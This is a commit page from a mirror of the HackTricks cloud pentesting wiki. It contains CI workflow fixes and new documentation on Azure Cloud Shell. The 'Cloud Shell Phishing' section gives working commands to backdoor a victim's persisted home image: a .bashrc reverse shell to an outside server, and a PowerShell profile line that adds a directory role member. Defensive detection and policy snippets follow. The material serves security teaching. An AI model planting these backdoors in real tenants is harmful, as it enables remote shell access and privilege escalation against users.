gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-12 07:40:49 -08:00
Code Issues Packages Projects Releases Wiki Activity

fix workflows

Browse Source
This commit is contained in:
Carlos Polop
2025-02-21 14:55:41 +01:00
parent 8fa715b08d
commit c6b3795cc5
17 changed files with 133 additions and 37 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
.github/workflows/build_master.yml vendored
View File

@@ -37,7 +37,7 @@ jobs:
- name: Update searchindex.js in repo
run: |
git config --global --add safe.directory /__w/hacktricks-cloud/hacktricks-cloud
(git config --global --add safe.directory /__w/hacktricks-cloud/hacktricks-cloud
git pull
git config --global user.email "build@example.com"
git config --global user.name "Build master"
@@ -46,7 +46,7 @@ jobs:
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_de.yml vendored
View File

@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_el.yml vendored
View File

@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_es.yml vendored
View File

@@ -67,13 +67,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_fr.yml vendored
View File

@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_hi.yml vendored
View File

@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_it.yml vendored
View File

@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_ja.yml vendored
View File

@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_ko.yml vendored
View File

@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_pl.yml vendored
View File

@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_pt.yml vendored
View File

@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_sr.yml vendored
View File

@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_sw.yml vendored
View File

@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_tr.yml vendored
View File

@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_uk.yml vendored
View File

@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

4
.github/workflows/translate_zh.yml vendored
View File

@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC

106
src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md
View File

@@ -10,11 +10,107 @@ There aren't permissions assigned to this service, therefore the aren't privileg
### Key Features
**Environment**:Azure Cloud Shell provides a secure environment by running on Azure Linux, Microsofts own Linux distribution designed for cloud infrastructure. All packages included in the Azure Linux repository are internally compiled by Microsoft to guard against supply chain attacks.
**Preinstalled Tools**: Cloud Shell includes a comprehensive set of preinstalled tools such as Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, and text editors like vim, nano, and emacs. These tools are ready to use. To list the installed packeges and modules you can use "Get-Module -ListAvailable", "tdnf list" and "pip3 list".
**$HOME persistence**: When starting Azure Cloud Shell for the first time, you can use it with or without an attached storage account. Choosing not to attach storage creates an ephemeral session where files are deleted when the session ends. To persist files across sessions, mount a storage account, which attaches automatically as **$HOME\clouddrive**, with your **$HOME** directory saved as an **.img** file in Azure File Share. However, files outside $HOME and machine states are not persisted. For securely storing secrets like SSH keys, use Azure Key Vault.
**Azure drive (Azure:)**: PowerShell in Azure Cloud Shell includes the Azure drive (Azure:), which allows easy navigation of Azure resources like Compute, Network, and Storage using filesystem-like commands. Switch to the Azure drive with cd Azure: and return to your home directory with cd ~. You can still use Azure PowerShell cmdlets to manage resources from any drive.
**Custom Tool Installation**: Users who configure Cloud Shell with a storage account can install additional tools that do not require root permissions. This feature allows for further customization of the Cloud Shell environment, enabling users to tailor their setup to their specific needs.
- **Preinstalled Tools**: Cloud Shell includes a comprehensive set of preinstalled tools such as Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, and text editors like vim, nano, and emacs. These tools are ready to use. To list the installed packeges and modules you can use "Get-Module -ListAvailable", "tdnf list" and "pip3 list".
- **Azure drive (Azure:)**: PowerShell in Azure Cloud Shell includes the Azure drive (Azure:), which allows easy navigation of Azure resources like Compute, Network, and Storage using filesystem-like commands. Switch to the Azure drive with cd Azure: and return to your home directory with cd ~. You can still use Azure PowerShell cmdlets to manage resources from any drive.
- **Custom Tool Installation**: Users who configure Cloud Shell with a storage account can install additional tools that do not require root permissions. This feature allows for further customization of the Cloud Shell environment, enabling users to tailor their setup to their specific needs.
- **$HOME persistence**: When starting Azure Cloud Shell for the first time, you can use it with or without an attached storage account.
- Choosing not to attach storage creates an ephemeral session where files are deleted when the session ends.
- To persist files across sessions, you are given the option to **mount a storage account**, which attaches automatically as `$HOME\clouddrive`, with your `$HOME` directory **saved as an .img file in a File Share.**
### Cloud Shell Phishing
If anattacker finds other users images in a Storage Accout he has write and read access to, he will be able to download the image, **add a bash and PS backdoor into it**, and upload it back to the Storage Account so next time the user access the shell, the **commands will be automatically executed**.
- **Download, backdoor and uplaod the image:**
```bash
# Download image
mkdir /tmp/phishing_img
az storage file download-batch -d /tmp/phishing_img --account-name <acc-name>
# Mount image
cd /tmp/phishing_img/.cloudconsole
mkdir /tmp/cloudpoison
sudo mount acc_username.img /tmp/cloudpoison
cd /tmp/cloudpoison
sudo mkdir .config
sudo mkdir .config/PowerShell
sudo touch .config/PowerShell/Microsoft.PowerShell_profile.ps1
sudo chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1
# Bash backdoor
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc
# PS backdoor
echo "Connect-AzureAD; Add-AzureADDirectoryRoleMember -ObjectId 1246bcfd-42dc-4bb7-a86d-3637ca422b21 -RefObjectId 1D8B2447-8318-41E5-B365-CB7275862F8A" >> .config/PowerShell/Microsoft.PowerShell_profile.ps1
cd /tmp
sudo umount /tmp/cloudpoison
# Upload image
az storage file upload --account-name <acc-name> --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img"
```
- **Then, phish the user to access https://shell.azure.com/**
### Find & Forbid Cloud Shell Automatic Storage Accounts
Storage accounts created by Cloud Shell are tagged with **`ms-resource-usage:azure-cloud-shell`**. Its possible to create an Azure resource policy that disable creating resources with this tag.
Find all the storage accounts created by Cloud Shell by tags:
```bash
az storage account list --output json | jq '.[] | select(.tags["ms-resource-usage"]=="azure-cloud-shell")'
```
Policy to forbid the creation of automatic storage accounts for cloud shell storage based on tags:
```json
{
displayName: "Restrict cloud shell storage account creation",
description: "Storage accounts that you create in Cloud Shell are tagged with ms-resource-usage:azure-cloud-shell. If you want to disallow users from creating storage accounts in Cloud Shell, create an Azure resource policy for tags that is triggered by this specific tag. https://learn.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage#restrict-resource-creation-with-an-azure-resource-policy",
metadata: {
category: "Storage",
version: "1.0.0"
},
mode: "All",
parameters: {
effect: {
type: "String",
metadata: {
displayName: "Effect",
description: "Deny, Audit or Disabled the execution of the Policy"
},
allowedValues: [
"Deny",
"Audit",
"Disabled"
],
defaultValue: "Audit"
}
},
policyRule: {
if: {
allOf: [
{
field: "type",
equals: "Microsoft.Storage/storageAccounts"
},
{
field: "tags['ms-resource-usage']",
equals: "azure-cloud-shell"
}
]
},
then: {
effect: "[parameters('effect')]"
}
}
}
```
## References